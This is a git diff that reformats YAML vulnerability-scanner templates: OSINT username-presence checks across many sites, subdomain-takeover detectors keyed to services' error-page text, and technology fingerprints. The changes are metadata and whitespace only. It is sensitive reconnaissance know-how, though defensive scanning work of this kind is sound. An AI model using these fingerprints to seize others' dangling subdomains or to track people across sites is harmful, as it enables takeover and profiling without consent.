cwe-id: CWE-200 - tags: osint,osint-tech,zatrybipl metadata: max-request: 1 + tags: osint,osint-tech,zatrybipl self-contained: true + http: - method: GET path: diff --git a/http/osint/zbiornik.yaml b/http/osint/zbiornik.yaml index 9eb911a220..709fc384af 100644 --- a/http/osint/zbiornik.yaml +++ b/http/osint/zbiornik.yaml @@ -3,17 +3,18 @@ id: zbiornik info: name: Zbiornik User Name Information - Detect author: dwisiswant0 - description: Zbiornik user name information check was conducted. severity: info + description: Zbiornik user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,zbiornik metadata: max-request: 1 + tags: osint,osint-porn,zbiornik self-contained: true + http: - method: GET path: diff --git a/http/osint/zhihu.yaml b/http/osint/zhihu.yaml index 4740e4592f..fb38c4b676 100644 --- a/http/osint/zhihu.yaml +++ b/http/osint/zhihu.yaml @@ -3,17 +3,18 @@ id: zhihu info: name: Zhihu User Name Information - Detect author: dwisiswant0 - description: Zhihu user name information check was conducted. severity: info + description: Zhihu user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,zhihu metadata: max-request: 1 + tags: osint,osint-social,zhihu self-contained: true + http: - method: GET path: diff --git a/http/osint/zillow.yaml b/http/osint/zillow.yaml index a32e34b3f2..fbd2fbe5a7 100644 --- a/http/osint/zillow.yaml +++ b/http/osint/zillow.yaml @@ -3,17 +3,18 @@ id: zillow info: name: Zillow User Name Information - Detect author: dwisiswant0 - description: Zillow user name information check was conducted. severity: info + description: Zillow user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,zillow metadata: max-request: 1 + tags: osint,osint-shopping,zillow self-contained: true + http: - method: GET path: diff --git a/http/osint/zmarsacom.yaml b/http/osint/zmarsacom.yaml index f6835d3060..b34d7d3bab 100644 --- a/http/osint/zmarsacom.yaml +++ b/http/osint/zmarsacom.yaml @@ -3,17 +3,18 @@ id: zmarsacom info: name: Zmarsa.com User Name Information - Detect author: dwisiswant0 - description: Zmarsa.com user name information check was conducted. severity: info + description: Zmarsa.com user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,zmarsacom metadata: max-request: 1 + tags: osint,osint-porn,zmarsacom self-contained: true + http: - method: GET path: diff --git a/http/osint/zomato.yaml b/http/osint/zomato.yaml index a0ff336378..f97607fb4b 100644 --- a/http/osint/zomato.yaml +++ b/http/osint/zomato.yaml @@ -3,17 +3,18 @@ id: zomato info: name: Zomato User Name Information - Detect author: dwisiswant0 - description: Zomato user name information check was conducted. severity: info + description: Zomato user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,zomato metadata: max-request: 1 + tags: osint,osint-social,zomato self-contained: true + http: - method: GET path: diff --git a/http/osint/zoomitir.yaml b/http/osint/zoomitir.yaml index 572dec1f93..766d5dc92d 100644 --- a/http/osint/zoomitir.yaml +++ b/http/osint/zoomitir.yaml @@ -3,17 +3,18 @@ id: zoomitir info: name: Zoomitir User Name Information - Detect author: dwisiswant0 - description: Zoomitir user name information check was conducted. severity: info + description: Zoomitir user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,zoomitir metadata: max-request: 1 + tags: osint,osint-tech,zoomitir self-contained: true + http: - method: GET path: diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index 104dd4dd81..832ae50968 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -7,9 +7,9 @@ info: description: Aftership subdomain takeover was detected. reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -24,4 +24,4 @@ http: - type: word words: - - Oops.

The page you're looking for doesn't exist. \ No newline at end of file + - Oops.

The page you're looking for doesn't exist. diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index fecf6b90ba..5c3aa17dfe 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -7,9 +7,9 @@ info: description: agilecrm subdomain takeover was detected. reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/145 - tags: takeover,agilecrm metadata: max-request: 1 + tags: takeover,agilecrm http: - method: GET @@ -24,4 +24,4 @@ http: - type: word words: - - Sorry, this page is no longer available. \ No newline at end of file + - Sorry, this page is no longer available. diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 63a160c4ea..a12dd8a89b 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -7,9 +7,9 @@ info: description: An Aha subdomain takeover was detected. reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -24,4 +24,4 @@ http: - type: word words: - - There is no portal here ... sending you back to Aha! \ No newline at end of file + - There is no portal here ... sending you back to Aha! diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index 168c595cc5..8787136786 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104 - tags: takeover,airee metadata: max-request: 1 + tags: takeover,airee http: - method: GET diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index 99102592b8..1c2ec18a25 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/126 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index b0118cab62..3e2484f7ec 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -4,12 +4,12 @@ info: name: Announcekit Takeover Detection author: melbadry9 severity: high - tags: takeover,announcekit reference: - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 metadata: max-request: 1 + tags: takeover,announcekit http: - method: GET diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index 245a3f7a30..1f758542a9 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/36 - tags: takeover,aws,bucket metadata: max-request: 1 + tags: takeover,aws,bucket http: - method: GET diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index 2f6275bf6e..587929faa9 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/158 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml index 13e3418e12..8250bfe707 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -29,4 +29,4 @@ http: - type: word words: - "text/plain" - part: header \ No newline at end of file + part: header diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 3da48ebf13..c2d00953c6 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 - tags: takeover,campaignmonitor metadata: max-request: 1 + tags: takeover,campaignmonitor http: - method: GET diff --git a/http/takeovers/canny-takeover.yaml b/http/takeovers/canny-takeover.yaml index 518f667286..f2f7d85fe9 100644 --- a/http/takeovers/canny-takeover.yaml +++ b/http/takeovers/canny-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/114 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/cargo-takeover.yaml b/http/takeovers/cargo-takeover.yaml index 64790fa8bd..2c6488d69b 100644 --- a/http/takeovers/cargo-takeover.yaml +++ b/http/takeovers/cargo-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." \ No newline at end of file + - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." diff --git a/http/takeovers/cargocollective-takeover.yaml b/http/takeovers/cargocollective-takeover.yaml index b1a2a0accc..d564e1d9c1 100644 --- a/http/takeovers/cargocollective-takeover.yaml +++ b/http/takeovers/cargocollective-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 - tags: takeover,cargocollective metadata: max-request: 1 + tags: takeover,cargocollective http: - method: GET diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index ce62bf911f..e7d1db47c8 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 - https://help.flexbe.com/domains/ - tags: takeover,flexbe metadata: max-request: 1 + tags: takeover,flexbe http: - method: GET diff --git a/http/takeovers/flywheel-takeover.yaml b/http/takeovers/flywheel-takeover.yaml index bef56bf1dc..0787ff7961 100644 --- a/http/takeovers/flywheel-takeover.yaml +++ b/http/takeovers/flywheel-takeover.yaml @@ -7,8 +7,8 @@ info: reference: - https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Flywheel" tags: takeover,flywheel @@ -29,4 +29,4 @@ http: - type: word part: body words: - - "We are sorry, you've landed on a page that is hosted by Flywheel" \ No newline at end of file + - "We are sorry, you've landed on a page that is hosted by Flywheel" diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index 7eda2b3353..5eaa45c8a4 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/170 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index 80bcb91ebe..7c79b918ea 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: dsl diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index 76e3b7ce65..c5baaaf95f 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235 - tags: takeover,getresponse metadata: max-request: 1 + tags: takeover,getresponse http: - method: GET diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index a3ace5c3fb..e47d094768 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89 - tags: takeover,ghost metadata: max-request: 1 + tags: takeover,ghost http: - method: GET diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index f5f0ee0dd9..60a5dba990 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/259 - https://hackerone.com/reports/223625 - tags: takeover,gitbook,hackerone metadata: max-request: 1 + tags: takeover,gitbook,hackerone http: - method: GET diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index 40d100b61b..2b314e3c81 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,github metadata: max-request: 1 + tags: takeover,github http: - method: GET diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index 02974dfbb5..61f9e6d08d 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://beaglesecurity.com/blog/vulnerability/hatenablog-takeover-detection.html - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,hatenablog metadata: max-request: 1 + tags: takeover,hatenablog http: - method: GET diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index 835c695642..bf33b1e485 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - We could not find what you're looking for. \ No newline at end of file + - We could not find what you're looking for. diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index 39ba277fad..14eded1126 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115 - tags: takeover,helprace metadata: max-request: 1 + tags: takeover,helprace http: - method: GET diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index b11247ca56..24524c7a90 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - "No settings were found for this company:" \ No newline at end of file + - "No settings were found for this company:" diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index ebbf4db2fd..4b2e057ae3 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/59 - https://hackerone.com/reports/335330 - tags: takeover,hubspot,hackerone metadata: max-request: 1 + tags: takeover,hubspot,hackerone http: - method: GET diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index df96a47b03..fdd3dfbe80 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/69 - tags: takeover,intercom metadata: max-request: 1 + tags: takeover,intercom http: - method: GET diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index d2392bfe7d..818834776e 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - This account no longer active \ No newline at end of file + - This account no longer active diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index b418dcd7bc..ae7b4444ee 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/pull/107 - tags: takeover,jetbrains metadata: max-request: 1 + tags: takeover,jetbrains http: - method: GET diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index cd094c83f4..d8bb82f059 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - No Site For Domain \ No newline at end of file + - No Site For Domain diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index d711b99b23..b0472a047c 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/74 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index 5366cc4683..b619bed81f 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -8,9 +8,9 @@ info: - https://www.youtube.com/watch?v=HRFplefT46U - https://github.com/EdOverflow/can-i-take-over-xyz/issues/166 - https://github.com/PushpenderIndia/subdover/issues/2 - tags: takeover,leadpages metadata: max-request: 1 + tags: takeover,leadpages http: - method: GET diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index 7e8f92f13f..fd67f8dcaf 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/14 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index af9e186485..1b36c30bc6 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://rivalsec.github.io/blog/2022/12/02/meteor.html - https://github.com/EdOverflow/can-i-take-over-xyz/issues/321 - tags: takeover,meteor metadata: max-request: 1 + tags: takeover,meteor http: - method: GET diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index 1981ef09c7..26d14c1751 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -8,9 +8,9 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/40 - https://monish-basaniwal.medium.com/how-i-found-my-first-subdomain-takeover-vulnerability-b7d5c17b61fd - https://github.com/EdOverflow/can-i-take-over-xyz/pull/289 - tags: takeover,netlify metadata: max-request: 1 + tags: takeover,netlify http: - method: GET diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index 29589e47ac..527d5f9ea5 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92 - tags: takeover,ngrok metadata: max-request: 1 + tags: takeover,ngrok http: - method: GET diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index e87ba3c40a..e6fd04c934 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index 7506b29e56..c49a398faa 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/24 - https://medium.com/bug-bounty/how-i-took-over-several-stanford-subdomains-also-let-me-explain-you-the-pain-to-report-it-d84b08704be8 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -28,4 +28,4 @@ http: - type: dsl dsl: - - '!contains(host,"apigee.io")' \ No newline at end of file + - '!contains(host,"apigee.io")' diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index fb63766fe8..3588d50980 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144 - tags: takeover,pingdom metadata: max-request: 1 + tags: takeover,pingdom http: - method: GET diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index e02b28e5b7..aafa4b5a97 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - If you need immediate assistance, please contact Error 404: Page Not Found" \ No newline at end of file + - "

Error 404: Page Not Found

" diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index 15dee298d1..1a541db464 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -4,9 +4,9 @@ info: name: Teamwork Takeover Detection author: pdteam severity: high - tags: takeover,teamwork metadata: max-request: 1 + tags: takeover,teamwork http: - method: GET diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index 77d41c9204..634a75b164 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/155 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -28,4 +28,4 @@ http: - type: word words: - "Please renew your subscription" - negative: true \ No newline at end of file + negative: true diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml index c3ea14e2d8..a90f782e6e 100644 --- a/http/takeovers/tumblr-takeover.yaml +++ b/http/takeovers/tumblr-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/240 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index 8a6a37c66a..a415683b35 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 - https://hackerone.com/reports/863551 - tags: takeover,uberflip,hackerone metadata: max-request: 1 + tags: takeover,uberflip,hackerone http: - method: GET diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index 1f7c7c90b8..b8c625abaf 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index dcb6447aec..dfa08be78c 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/163 - https://hackerone.com/reports/269109 - tags: takeover,uservoice,hackerone metadata: max-request: 1 + tags: takeover,uservoice,hackerone http: - method: GET diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index b0c112b394..a44f19c4d6 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET @@ -23,4 +23,4 @@ http: - type: word words: - - Looks like you've traveled too far into cyberspace. \ No newline at end of file + - Looks like you've traveled too far into cyberspace. diff --git a/http/takeovers/vercel-takeover.yaml b/http/takeovers/vercel-takeover.yaml index 7e560b80e3..30c46f4183 100644 --- a/http/takeovers/vercel-takeover.yaml +++ b/http/takeovers/vercel-takeover.yaml @@ -8,8 +8,8 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/pull/375 - https://github.com/EdOverflow/can-i-take-over-xyz/issues/183 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"The deployment could not be found on Vercel" tags: takeover,vercel diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml index fb610dc8b3..8c60df322f 100644 --- a/http/takeovers/webflow-takeover.yaml +++ b/http/takeovers/webflow-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44 - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172 - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index 826e55f172..a2dbf2da29 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,wishpond metadata: max-request: 1 + tags: takeover,wishpond http: - method: GET diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index 8de13a639a..e1c38a86ca 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -7,9 +7,9 @@ info: description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over. reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/231 - tags: takeover,wix metadata: max-request: 1 + tags: takeover,wix http: - method: GET @@ -30,4 +30,4 @@ http: - type: status status: - - 404 \ No newline at end of file + - 404 diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index 8419ffce06..12caac5d4c 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/pull/176 - https://hackerone.com/reports/274336 - tags: takeover,wordpress,hackerone metadata: max-request: 1 + tags: takeover,wordpress,hackerone http: - method: GET diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index fafd670835..24637ebbd8 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites - tags: takeover metadata: max-request: 1 + tags: takeover http: - method: GET diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index 507cfc60e6..76afd00272 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -8,9 +8,9 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 - https://hackerone.com/reports/869605 - https://hackerone.com/reports/759454 - tags: takeover,zendesk,hackerone metadata: max-request: 1 + tags: takeover,zendesk,hackerone http: - method: GET diff --git a/http/technologies/acontent-detect.yaml b/http/technologies/acontent-detect.yaml index 504ad4e9d4..e60861e1f1 100644 --- a/http/technologies/acontent-detect.yaml +++ b/http/technologies/acontent-detect.yaml @@ -4,18 +4,19 @@ info: name: AContent Detect author: pikpikcu severity: info - tags: tech,acontent metadata: max-request: 1 + tags: tech,acontent http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/activecollab-detect.yaml b/http/technologies/activecollab-detect.yaml index f3b95290e0..74284498ca 100644 --- 